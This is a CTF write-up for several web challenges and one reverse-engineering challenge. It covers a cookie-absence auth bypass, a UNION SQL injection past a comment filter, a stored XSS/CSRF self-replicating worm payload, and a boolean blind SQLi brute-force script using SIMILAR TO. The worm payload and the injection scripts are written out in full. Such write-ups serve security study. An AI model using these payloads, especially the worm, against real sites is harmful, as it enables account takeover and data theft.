I'm open to any detailed questions; please DM me on Discord or ask down below.
web/flaglang
The server only releases the flag when the request cookie carries a specific password equal to a randomly generated one, which would normally be impossible to guess. Yet the check can be bypassed simply by removing the cookie from the request: the password is only compared when the cookie is present.
GET /view?country=Flagistan
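The bypass works because the password check fails open. The following is an added illustration of that pattern, not the challenge's own code: the handler shape, the route parameters and the flag value are all assumed, with the vulnerable check beside a fail-closed version.

```python
import hmac
import secrets

# Hypothetical stand-ins: the real server generates its own password at startup
# and the flag below is a constructed placeholder.
FLAG_PASSWORD = secrets.token_hex(16)
FLAG = "lactf{constructed_placeholder}"


def view_country_vulnerable(country, cookies):
    """Fails open: the password is compared only when the cookie exists, so a
    request that omits the cookie entirely walks straight to the flag."""
    if country != "Flagistan":
        return "Hello from %s" % country
    if "password" in cookies and cookies["password"] != FLAG_PASSWORD:
        return "wrong password"
    return FLAG


def view_country_fixed(country, cookies):
    """Fails closed: a missing cookie is treated exactly like a wrong one, and
    the comparison is constant-time."""
    if country != "Flagistan":
        return "Hello from %s" % country
    supplied = cookies.get("password")
    if supplied is None or not hmac.compare_digest(
        supplied.encode(), FLAG_PASSWORD.encode()
    ):
        return "wrong password"
    return FLAG
```

The absence of a credential has to be an explicit branch; testing only "present and wrong" leaves "absent" as an accepted state.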
web/la housing portal
All arguments of the /submit API, except for name, are collected and concatenated into a SQL query, which makes it vulnerable to SQL injection; the only defence is that comment symbols are filtered out.
My strategy is to remove all arguments but guests and conduct a union injection to retrieve the flag.
POST /submit
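The request body itself is truncated above, so here is an added, self-contained reconstruction of the technique against an in-memory SQLite database; it is not the challenge's code. The table and column names, the exact statement the handler builds, and the set of comment tokens it filters are all assumptions. The point it demonstrates is how a UNION payload is kept well formed when comment symbols cannot be used to discard the trailing quote.

```python
import re
import sqlite3

# Assumed filter: the comment tokens the handler refuses.
COMMENT_RE = re.compile(r"--|/\*|#")


def build_db():
    """Constructed sample data standing in for the portal's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE rooms (name TEXT, guests INTEGER, rent INTEGER);
        INSERT INTO rooms VALUES ('Westwood single', 1, 1200),
                                 ('Gayley double', 2, 900);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('lactf{constructed_placeholder}');
    """)
    return db


def submit(db, guests):
    """Assumed shape of the vulnerable handler with every argument but
    `guests` removed: the value is concatenated into the statement, and
    only comment tokens are rejected."""
    if COMMENT_RE.search(guests):
        raise ValueError("comment symbols are not allowed")
    query = "SELECT name, rent FROM rooms WHERE guests = '%s'" % guests
    return db.execute(query).fetchall()


# With comments filtered, the payload cannot throw away the handler's closing
# quote, so it closes the opened literal, appends the UNION, and opens a new
# literal that the handler's own trailing quote terminates:
#   ... WHERE guests = '' UNION SELECT flag, 0 FROM flag WHERE '1'='1'
UNION_PAYLOAD = "' UNION SELECT flag, 0 FROM flag WHERE '1'='1"


def exfiltrate_flag(db):
    """Returns the first column of every row the injected query yields; the
    column count (2) must match the original SELECT for the UNION to parse."""
    rows = submit(db, UNION_PAYLOAD)
    return [name for name, _ in rows]
```

A comment filter does nothing on its own: any payload that balances the quotes it opens needs no comment at all, and the real fix is a parameterised query.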
web/new-housing-portal
Core Concepts: XSS + CSRF
Technique: Bypassing innerHTML with event handlers + code worm self-replication
The username field is vulnerable to stored XSS. The username is fetched via Ajax and inserted into the page with innerHTML, and browsers never execute script elements inserted that way, so a bare script tag will not run. Event handler attributes on the inserted markup do fire, however.
The payload is therefore slightly more involved: an img element whose onerror handler evals the text of a sibling script element with id worm. That script contains worm-like self-replicating code, which is necessary because the entire payload has to be carried as the value of a single request parameter in the request it forges from the victim's session (the CSRF step), so it re-encodes its own source and resubmits it as the username.
Final payload:
<img src=1 onerror=eval(document.getElementById('worm').innerHTML)><script id=worm>var headerTag="<script id=worm>"; var jsCode = document.getElementById("worm").innerHTML; var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); var xhr = new XMLHttpRequest(); xhr.open("POST", "https://new-housing-portal.chall.lac.tf/finder"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("username="+"<img src=1 onerror=eval(document.getElementById('worm').innerHTML)>"+wormCode); </script>
web/pogn
Simply open a WebSocket connection through Burp Suite and wait until the ball goes out of bounds.
web/penguin-login
There is a SQL injection vulnerability behind a stricter filter, which bans every special character except the braces { }, the underscore _ and the single quote '. The filter also bans the LIKE keyword.
The SQL injection can only be exploited as error-based or boolean-based injection. The former seems impossible to my best knowledge, and we can use the SIMILAR TO expression as an alternative to LIKE for conducting boolean injection.
The SIMILAR TO expression supports the _ pattern, which matches exactly one arbitrary character, the same as . in POSIX regular expressions.
We can leverage _ to determine the real length of the flag (a run of n underscores matches only a value of length n), then craft a script to brute force it out character by character.
The script:
import requests
One thing remains to consider: in a SIMILAR TO pattern, a digit placed right after { turns the brace into a repetition bound (as in a{3}), because { keeps its regular-expression meaning there. Every probe that puts a digit in the position after { is therefore a malformed bound and throws an "invalid repetition count(s)" error instead of answering true or false.
So this one character has to be confirmed through the normal equality query instead of the pattern query.
The real character is indeed the digit 9.
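The page's own script is truncated, so the following is an added, self-contained version of the whole procedure (length probe, per-position brute force, and the { caveat), written against a simulated oracle rather than the live endpoint; it is not the author's script. The secret value, the allowed character set, and the oracle functions are constructed here: in the real challenge oracle() is a requests.post to the login endpoint whose response distinguishes a matched row from no row, and exact_oracle() is the normal login query.

```python
import itertools
import re
import string

# Constructed secret for the simulated oracle (not the challenge's real flag).
SECRET_FLAG = "lactf{9_penguins_here}"

# Characters the filter lets through, per the writeup: alphanumerics plus { _ } '
ALLOWED = set(string.ascii_letters + string.digits + "{_}'")

# Candidates tried at each position. `_` is deliberately absent: in SIMILAR TO
# it is a wildcard, so it would "match" every position; a literal underscore
# can only be inferred by elimination.
CHARSET = string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}"

BOUND_RE = re.compile(r"\{\d+(,\d*)?\}")


def similar_to_regex(pattern):
    """Translate a SIMILAR TO pattern into a Python regex, mimicking the two
    PostgreSQL behaviours that matter here: `_` matches exactly one character,
    and `{` immediately followed by a digit opens a repetition bound, which
    errors out ("invalid repetition count(s)") when it is malformed."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "_":
            out.append(".")
            i += 1
        elif c == "{" and i + 1 < len(pattern) and pattern[i + 1].isdigit():
            m = BOUND_RE.match(pattern, i)
            if m is None:
                raise ValueError("invalid repetition count(s)")
            out.append(m.group(0))  # a well-formed bound is valid regex as-is
            i = m.end()
        else:
            out.append(re.escape(c))  # `{` not followed by a digit is plain
            i += 1
    return "".join(out)


def oracle(pattern):
    """Simulated boolean oracle: True when a row satisfies
    name SIMILAR TO '<pattern>'. Raises on filtered characters (request
    rejected) and on malformed bounds (database error)."""
    if not set(pattern) <= ALLOWED:
        raise ValueError("filtered character in input")
    return re.fullmatch(similar_to_regex(pattern), SECRET_FLAG) is not None


def exact_oracle(candidate):
    """Plain equality query (the normal login path), used to settle what the
    pattern oracle cannot test."""
    return candidate == SECRET_FLAG


def find_length(max_len=64):
    for n in range(1, max_len + 1):
        if oracle("_" * n):
            return n
    raise RuntimeError("no value of length <= %d" % max_len)


def recover_flag(prefix="lactf{"):
    length = find_length()
    known = list(prefix)
    ambiguous = {}  # position -> characters SIMILAR TO could not settle
    for pos in range(len(prefix), length):
        tail = "_" * (length - pos - 1)
        untestable, hit = [], None
        for c in CHARSET:
            try:
                if oracle("".join(known) + c + tail):
                    hit = c
                    break
            except ValueError:
                # `{` + digit parsed as a bound: this digit cannot be probed here.
                untestable.append(c)
        if hit is None:
            # Either a literal `_` (never confirmable, the wildcard always
            # matches) or one of the digits whose probe errored out.
            ambiguous[pos] = untestable + ["_"]
            hit = "_"  # keep probing later positions through a wildcard
        known.append(hit)
    # Resolve the leftover positions with the equality query.
    positions = sorted(ambiguous)
    for combo in itertools.product(*(ambiguous[p] for p in positions)):
        candidate = known[:]
        for p, c in zip(positions, combo):
            candidate[p] = c
        if exact_oracle("".join(candidate)):
            return "".join(candidate)
    raise RuntimeError("no candidate passed the exact check")
```

Two things the plain description hides: the position right after { can only be finished by the equality query because every digit probe there errors rather than answers, and a literal underscore in the flag is never confirmed positively, since _ cannot be escaped with the backslash banned, so it is what remains when every other candidate fails.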
rev/aplet321
Reverse engineer the binary and write a script that inverts its logic.
Script:
# Calculate the occurrences of "please" and "pretty"